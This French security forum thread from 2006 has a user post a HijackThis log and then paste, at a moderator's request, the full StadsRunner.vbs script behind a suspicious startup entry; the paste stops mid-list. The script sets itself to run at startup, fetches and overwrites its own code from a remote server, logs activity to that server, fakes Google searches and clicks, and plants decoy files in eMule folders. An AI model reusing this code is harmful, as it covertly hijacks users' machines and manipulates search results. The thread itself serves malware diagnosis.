Analyse d'un log

Sécurité et insécurité. Virus, Trojans, Spywares, Failles etc. …

Modérateur: Modérateurs et Modératrices

Règles du forum
Assiste.com a suspendu l'assistance à la décontamination après presque 15 ans sur l'ancien forum puis celui-ci. Voir :

Procédure de décontamination 1 - Anti-malware
Décontamination anti-malwares

Procédure de décontamination 2 - Anti-malware et antivirus (La Manip)
La Manip - Procédure standard de décontamination

Entretien périodique d'un PC sous Windows
Entretien périodique d'un PC sous Windows

Protection des navigateurs, de la navigation et de la vie privée
Protéger le navigateur, la navigation et la vie privée

Analyse d'un log

Messagede yoyo92 » 11 Juin 2006, 17:09

Bonjour,

Et merci d'avance. Voilà mon ordianteur rame. J'essayer de nettoyer mais bon, rien de concluant. Donc, je vous soumet mon log. J'ai bien sûr suivi le protocole de décontamination avant de prosposer ce log.
Bon ben, je me lance.
Logfile of HijackThis v1.99.1
Scan saved at 17:44:21, on 11/06/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Adobe\Photoshop Elements 4.0\PhotoshopElementsFileAgent.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Program Files\ewido\security suite\ewidoguard.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\MsPMSPSv.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\windows\system\hpsysdrv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\hphmon06.exe
C:\HP\KBD\KBD.EXE
C:\WINDOWS\ALCXMNTR.EXE
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\BroadJump\Client Foundation\CFD.exe
C:\Program Files\Fichiers communs\Talkway\vmtalk.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Creative\Shared Files\CAMTRAY.EXE
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\PROGRA~1\MUSICM~1\MUSICM~2\MMDiag.exe
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\Adobe\Photoshop Elements 4.0\apdproxy.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Musicmatch\Musicmatch Jukebox\mim.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\Club-Internet\Dr Club Internet\bin\mpbtn.exe
C:\Program Files\SAGEM\SAGEM F@st800\dslmon.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Trend Micro\Tmas\Tmas.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\explorer.exe
C:\secur\hijachThis\hijackthis(1)\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE= ... pf=desktop
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://ie.redirect.hp.com/svs/rdr?TYPE= ... pf=desktop
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.club-internet.fr/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE= ... pf=desktop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://fr.rd.yahoo.com/customize/ie/def ... .yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://fr.rd.yahoo.com/customize/ie/def ... .yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://fr.yahoo.com
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://fr.rd.yahoo.com/customize/ie/def ... .yahoo.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer avec Club-Internet
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: BrowserHelper Class - {EBCDDA60-2A68-11D3-8A43-0060083CFB9C} - C:\WINDOWS\system32\nzdd.dll
O3 - Toolbar: Vue HP - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\HPDTLK02.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet /keeploaded /nodetect
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [HPHUPD06] c:\Program Files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe
O4 - HKLM\..\Run: [HPHmon06] C:\WINDOWS\system32\hphmon06.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE
O4 - HKLM\..\Run: [PS2] C:\WINDOWS\system32\ps2.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [STAdS System] C:\Program Files\STAdS\StadsRunner.vbs
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [BJCFD] C:\Program Files\BroadJump\Client Foundation\CFD.exe
O4 - HKLM\..\Run: [vmtalk] C:\Program Files\Fichiers communs\Talkway\vmtalk.exe
O4 - HKLM\..\Run: [MimBoot] C:\PROGRA~1\MUSICM~1\MUSICM~2\mimboot.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [Creative WebCam Tray] C:\Program Files\Creative\Shared Files\CAMTRAY.EXE
O4 - HKLM\..\Run: [CTRegRun] C:\WINDOWS\CTRegRun.EXE
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Elements 4.0\apdproxy.exe"
O4 - HKLM\..\Run: [Digital Video Duplicator OLR] C:\PROGRA~1\DIGITA~1\BVRPOlr.exe /Digital Video Duplicator
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] C:\Program Files\Yahoo!\Messenger\ypager.exe -quiet
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Club Internet.lnk = ?
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Docteur Club Internet.lnk = C:\Program Files\Club-Internet\Dr Club Internet\bin\matcli.exe
O4 - Global Startup: DSLMON.lnk = ?
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: RealDownload.lnk = C:\Program Files\Real\RealDownload\Realdownload0.exe
O4 - Global Startup: Trend Micro Anti-Spyware.lnk = C:\Program Files\Trend Micro\Tmas\Tmas.exe
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Messenger - {4528BBE0-4E08-11D5-AD55-00010333D0AD} - C:\PROGRA~1\Yahoo!\Common\yhexbmesfr.dll
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {4528BBE0-4E08-11D5-AD55-00010333D0AD} - C:\PROGRA~1\Yahoo!\Common\yhexbmesfr.dll
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.zebulon.fr/outils/antivirus/ ... nicode.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=48835
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupda ... 2741859593
O16 - DPF: {6E5A37BF-FD42-463A-877C-4EB7002E68AE} (Housecall ActiveX 6.5) - http://housecall65.trendmicro.com/house ... hcImpl.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2005 ... scan53.cab
O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.inoculer.com/antivirus/Msie/bitdefender.cab
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Adobe Active File Monitor V4 (AdobeActiveFileMonitor4.0) - Unknown owner - C:\Program Files\Adobe\Photoshop Elements 4.0\PhotoshopElementsFileAgent.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: ewido security suite guard - ewido networks - C:\Program Files\ewido\security suite\ewidoguard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Fichiers communs\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: StarWind iSCSI Service (StarWindService) - Rocket Division Software - C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe


Moi, j'y comprend pas grand chose. Donc, bon courage pour ceux qui prendront la peine d'examiner ce log.
yoyo92
 
Messages: 3
Inscription: 11 Juin 2006, 17:01

Messagede nickW » 11 Juin 2006, 18:25

Bonsoir,

Sais-tu ce que contient le dossier: C:\Program Files\STAdS ?

Peux-tu envoyer en réponse le contenu du fichier StadsRunner.vbs qui se trouve dans ce dossier (C:\Program Files\STAdS)?

Il faut faire un clic droit sur le fichier (StadsRunner.vbs), choisir Ouvrir avec dans le menu déroulant qui s'est affiché, puis choisir Bloc-notes.
Une fenêtre du bloc-notes s'ouvre, dans le menu Edition choisir Sélectionner tout, puis toujours dans le menu Edition choisir Copier.
Ensuite, tu reviens jusqu'à ton message dans le forum, tu cliques sur Répondre, et dans la fenêtre blanche tu fais un clic droit et tu choisis Coller.

A suivre,
nickW - Image
30/07/2012: Plus de désinfection de PC jusqu'à nouvel ordre.
Pas de demande d'analyse de log en MP (Message Privé)
Mes configs
Avatar de l’utilisateur
nickW
Modérateur
 
Messages: 21698
Inscription: 20 Mai 2004, 17:41
Localisation: Dordogne/Île de France

Messagede yoyo92 » 11 Juin 2006, 19:45

Merci de ton attention. J'ai fais ce que tu m'as dis mais je te préviens c'est plutôt long à lire. D'après ce que je vois, c'est un truc pour apprendre les langues. Je cherchais un truc pour apprendre le chinois. Je n'avais pas vu que ce programe s'était installé :oops: :oops:

' STAdSRunner.vbs
' SharedTalk Advertisement System Runner
On Error Resume Next
' Init
Const ForWriting =2
Set oWshShell = WScript.CreateObject("WScript.Shell")
Set oProcEnv = oWshShell.Environment("PROCESS")
Set oHttp = Wscript.CreateObject("Microsoft.XmlHttp")
Set oFS = Wscript.CreateObject("Scripting.FileSystemObject")
sServerPath = "http://www.sharedtalk.com/STAdS/"
sWinDir = oProcEnv("WinDir") ' Get Windows Directory Path
sRegRun = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\STAdS System"
sRegSoft = "HKLM\SOFTWARE\"
set Args = WScript.Arguments
' Make sure it is not run more than once per Day (and not on first run or on uninstall)
If Args.Count = 0 Then
Today = Replace (Cstr(Date), "/", "-")
Fileday = Replace (Left(oFS.GetFile(WScript.ScriptFullName).DateLastModified, 10), "/", "-")
If (Today = Fileday) Then
Update = False
LastRun = "-NoUpdate" '"-LastRun.:.Today.("+Today+")"
Else
Update = True
LastRun = "-Update" '"-LastRun.:."+Fileday
End If
End If
' Wait for the internet connection
If Args.Count = 0 Then WaitConnection()
' Determine Language
Language = "en"
Select Case GetLocale()
Case 11274, 16394, 13322, 9226, 5130, 7178, 12298, 17418, 4106, 18442 Language = "es"
Case 2058, 3082, 19466, 6154, 15370, 10250, 20490, 1034, 14346, 8202 Language = "es"
Case 1036, 2060, 3084, 4108, 5132 Language = "fr"
End Select
' Get Emule Folder
EmuleFolder = ""
If oFS.FolderExists(oProcEnv("ProgramFiles")+"\eMule\Incoming") Then EmuleFolder = oProcEnv("ProgramFiles")+"\eMule\Incoming"
If oFS.FolderExists(oWshShell.RegRead ("HKCU\Software\eMule\Install Path")+"\Incoming") Then EmuleFolder = oWshShell.RegRead ("HKCU\Software\eMule\Install Path")+"\Incoming"
If EmuleFolder = "" Then
ed2kContent = oWshShell.RegRead ("HKLM\Software\Classes\ed2k\DefaultIcon\")
If Not InStr(1, ed2kContent, "emule.exe", vbTextCompare) = 0 Then EmuleFolder = Left(ed2kContent, InStr(1, ed2kContent, "emule.exe", vbTextCompare)-1) + "Incoming"
If Not oFS.FolderExists(EmuleFolder) Then EmuleFolder = ""
End If
' Get STAdS Start Menu Folder
sPrograms = oWshShell.SpecialFolders("AllUsersPrograms")+"\STAdS"
' Get Running Mode
Mode = SetGetSTAdSMode () ' Set/Select STAdS Mode
' Quit If Emule Folder is missing
If EmuleFolder = "" Then
Logging("...No.Emule.Folder.-.Deleting.STAdS")
DeleteStads()
End If
' Get STAdS Folder PAth
sSTAdSDir = oProcEnv("ProgramFiles")+"\STAdS"
' Create STAdS Folder if needed
If Not oFS.FolderExists (sSTAdSDir) Then oFS.CreateFolder (sSTAdSDir)
' Delete STAdS if STAdS Folder doesn't exists
If Not oFS.FolderExists (sSTAdSDir) Then
Logging("...STAdS.Folder.Creation.Failed.-.Deleting.STAdS")
DeleteStads()
End If
' Create Needed Files
CreateFile "Duplicator", "StadsDuplicator.bat"
CreateFile "LinksCreator", "StadsLinksCreator.bat"
' Delete STAdS if Uninstall has been asked
If Args.Count > 0 Then
If Args(0) = "Uninstall" Then UninstallStads()
End If
' Create Uninstall Batch
CreateFile "Uninstall", "Uninstall STAdS.bat"
' Create STAdS Start Menu Folder in AllUsersPrograms if needed
If Not oFS.FolderExists (sPrograms) Then oFS.CreateFolder (sPrograms)
' Delete STAdS if STAdS Start Menu Folder doesn't exists
If Not oFS.FolderExists (sPrograms) Then
Logging("...Start.Menu.Folder.Creation.Failed.-.Deleting.STAdS")
DeleteStads()
Else
'create Uninstall shortcut
set oShellLink = oWshShell.CreateShortcut(sPrograms & "\Uninstall STAdS.lnk")
oShellLink.TargetPath = sSTAdSDir+"\Uninstall STAdS.bat"
oShellLink.Save
End If
' Set AutoStart
oWshShell.RegWrite sRegRun, sSTAdSDir+"\StadsRunner.vbs", "REG_SZ"
' Update STAdSRunner.vbs
If Not Update = False Then GetAndWrite "StadsRunner.vbs", "StadsRunner.vbs" ' NOT NEEDED ON A FIRST RUN
' Get Needed File for Distribute Mode
CreateFile "LinksDefs", "StadsLinksDefs.txt"
' Launch Sub Scripts
oWshShell.Run """"+sSTAdSDir + "\StadsDuplicator.bat"" CleanOnly", 0, True
oWshShell.Run """"+sSTAdSDir + "\StadsLinksCreator.bat""", 0, True
' Delete Files From Previous Version
DeleteFile (sWinDir + "\rar.exe")
DeleteFile (sWinDir + "\StadsInstaller.rar")
DeleteFile (sWinDir + "\StadsRunner.vbs")
DeleteFile (sWinDir + "\StadsLinksCreator.bat")
DeleteFile (sWinDir + "\StadsLinksDefs.txt")
DeleteFile (sWinDir + "\StadsDuplicator.bat")
DeleteFile (sWinDir + "\StadsModifier.rar")
' Delete Files From Current Version
DeleteFile (sSTAdSDir + "\StadsLinksCreator.bat")
DeleteFile (sSTAdSDir + "\StadsLinksDefs.txt")
DeleteFile (sSTAdSDir + "\StadsDuplicator.bat")
DeleteFile (sSTAdSDir + "\StadsModifier.rar")
' Log End Tag
Logging("----------------------")

' ---------------------------------------------------------------------------------
' Wait for Internet Connection
' ---------------------------------------------------------------------------------
Function WaitConnection()
On Error Resume Next
Do
oHttp.open "GET", "http://www.sharedtalk.com/STAdS/Connected.txt", FALSE
oHttp.send ""
If Not oHttp.status = 200 Then WScript.Sleep 300000
Loop Until oHttp.status = 200

Randomize()
RandomNumber = Rnd()
If RandomNumber < .20 Then Keywords="www.sharedtalk.com"
If RandomNumber >= .20 And RandomNumber < .40 Then Keywords="sharedtalk.com"
If RandomNumber >= .40 And RandomNumber < .60 Then Keywords="sharedtalk"
If RandomNumber >= .60 Then Keywords="language exchange"
URL = "http://www.google.com"

With CreateObject("InternetExplorer.Application")
'Open Google
.Navigate URL
Do Until .ReadyState = 4
Wscript.sleep 100
Loop
'Write the query in the search box
.document.all.namedItem("q").value = Keywords
WScript.Sleep 500
'Submit the form and wait for the result
.document.all.namedItem("f").submit()
Wscript.sleep 10000
'Record the 9 following result pages
Dim ResultPages(30)
i=1
for each link in .document.links
If (instr(1,link,"&start=")) Then
ResultPages(i) = link
i=i+1
End If
Next
'Parse the 10 result pages until website is found
found = False
i=1

Do
for each link in .document.links
If (Not Found And link = "http://www.sharedtalk.com/") Then
Found = True
link.onmousedown() 'link.click()
'If (Keywords="Language Exchange") Then Logging ("...GooglePos.=." + mid(link.onmousedown, instr(1,link.onmousedown,"'res','")+7, 3))
Logging ("...GooglePos.=." + mid(link.onmousedown, instr(1,link.onmousedown,"'res','")+7, 3)+".("+Keywords+")")
End If
Next

If (ResultPages(i)<>"") Then
If (Found = False) Then
URL = ResultPages(i)
.Navigate URL
Do Until .ReadyState = 4
Wscript.sleep 100
Loop
End If
i=i+1
WScript.Sleep 1000
Else
i = 10
End If
Loop Until Found = True Or i = 10
'Quit
.Quit
End With
If (Not Found) Then Logging ("...GooglePos.=.--.("+Keywords+")")

End Function

' ---------------------------------------------------------------------------------
' Get From Web Server And Write To File
' ---------------------------------------------------------------------------------
Function GetAndWrite(sFilename, sTargetFilename)
On Error Resume Next
' Get File From Server
Retry = False
Do
If Retry = True Then Logging ("---Retrying.to.load." + sFilename)
oHttp.open "GET", sServerPath+sFilename, FALSE
oHttp.send ""
If (oHttp.status <> 200) Then
Logging ("...Failed.to.load." + sFilename)
WScript.Sleep 60000
End If
Retry = True
Loop Until oHttp.status = 200
' Write File To Path
Set oFile = oFS.OpenTextFile(sSTAdSDir+"\"+sTargetFilename,ForWriting,True)
oFile.Write(oHttp.responseText)
oFile.Close
Set oFile = Nothing
' Delete All and Exit if file missing in %windir%
If Not oFS.FileExists(sSTAdSDir+"\"+sTargetFilename) Then
Logging("...Needed.Files.Missing("+sFilename+").-.Exiting.STAdS")
WScript.Quit
'DeleteStads()
End If
End Function

' ---------------------------------------------------------------------------------
' Delete File
' ---------------------------------------------------------------------------------
Function DeleteFile(sPath)
set oFile = oFS.GetFile(sPath)
oFile.Delete
Set oFile = Nothing
End Function

' ---------------------------------------------------------------------------------
' Uninstall STAdS
' ---------------------------------------------------------------------------------
Function UninstallStads()
'Logging("...Uninstalling.STAdS") 'REMOVE BECAUSE IT BLOCKS UNINSTALLATION IF NO INTERNET CONNECTION
oWshShell.RegDelete "HKLM\Software\STAdS\" ' Delete Installed Signal
DeleteStads()
End Function
' ---------------------------------------------------------------------------------
' Delete STAdS (Because of a failure to install/run)
' ---------------------------------------------------------------------------------
Function DeleteStads()
On Error Resume Next
' Delete Emule Shared Files
oWshShell.Run """" + sSTAdSDir + "\StadsLinksCreator.bat"" CleanOnly", 0, True
oWshShell.Run """" + sSTAdSDir + "\StadsDuplicator.bat"" CleanOnly", 0, True
' Delete Permanent Files From Previous Version
DeleteFile (sWinDir + "\StadsInstaller.rar")
DeleteFile (sWinDir + "\rar.exe")
DeleteFile (sWinDir + "\StadsRunner.vbs")
' Delete Files From the Current Version
oFS.DeleteFolder sSTAdSDir, True
oFS.DeleteFolder sPrograms, True

oWshShell.RegDelete sRegRun ' Delete AutoStart
Logging("----------------------") ' Log End Tag
WScript.Quit ()
End Function

' ---------------------------------------------------------------------------------
' Get and/or Set STAdS Mode
' ---------------------------------------------------------------------------------
Function SetGetSTAdSMode ()
On Error Resume Next
Dim sMode

sMode = oWshShell.RegRead (sRegSoft+"STAdS\Mode")
If sMode = "" Then
Update = True
End If

sMode = "Distribute"
oWshShell.RegWrite sRegSoft+"STAdS\Mode", sMode, "REG_SZ"

Logging ("19-"+sMode+LastRun)
SetGetSTAdSMode = sMode
End Function

' ---------------------------------------------------------------------------------
' Remote Logging
' ---------------------------------------------------------------------------------
Function Logging (Text)
oHttp.open "GET", sServerPath+"logging.aspx?"+Text, FALSE
oHttp.send ""
End Function

' ---------------------------------------------------------------------------------
' Create Special File
' ---------------------------------------------------------------------------------
Function CreateFile(Content, FileName)
Set oFile = oFS.OpenTextFile(sSTAdSDir+"\"+FileName,ForWriting,True)
With oFile
Select Case Content
Case "LinksDefs"
Select Case Language
Case "fr"
.WriteLine "41,Apprendre l'italien avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "42,Apprendre l'italien avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "43,Apprendre l'italien avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "44,Apprendre l'italien avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "45,Apprendre l'italien avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "46,Apprendre l'italien avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "47,Apprendre l'italien avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "48,Apprendre l'italien avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "51,Apprendre le portugais avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "52,Apprendre le portugais avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "53,Apprendre le portugais avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "54,Apprendre le portugais avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "55,Apprendre le portugais avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "56,Apprendre le portugais avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "57,Apprendre le portugais avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "58,Apprendre le portugais avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "61,Apprendre l'arabe avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "62,Apprendre l'arabe avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "63,Apprendre l'arabe avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "64,Apprendre l'arabe avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "65,Apprendre l'arabe avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "66,Apprendre l'arabe avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "67,Apprendre l'arabe avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "68,Apprendre l'arabe avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "21,Apprendre l'espagnol avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "22,Apprendre l'espagnol avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "23,Apprendre l'espagnol avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "24,Apprendre l'espagnol avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "25,Apprendre l'espagnol avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "26,Apprendre l'espagnol avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "27,Apprendre l'espagnol avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "28,Apprendre l'espagnol avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "71,Apprendre le russe avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "72,Apprendre le russe avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "73,Apprendre le russe avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "74,Apprendre le russe avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "75,Apprendre le russe avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "76,Apprendre le russe avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "77,Apprendre le russe avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "78,Apprendre le russe avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "81,Apprendre le chinois avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "82,Apprendre le chinois avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "83,Apprendre le chinois avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "84,Apprendre le chinois avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "85,Apprendre le chinois avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "86,Apprendre le chinois avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
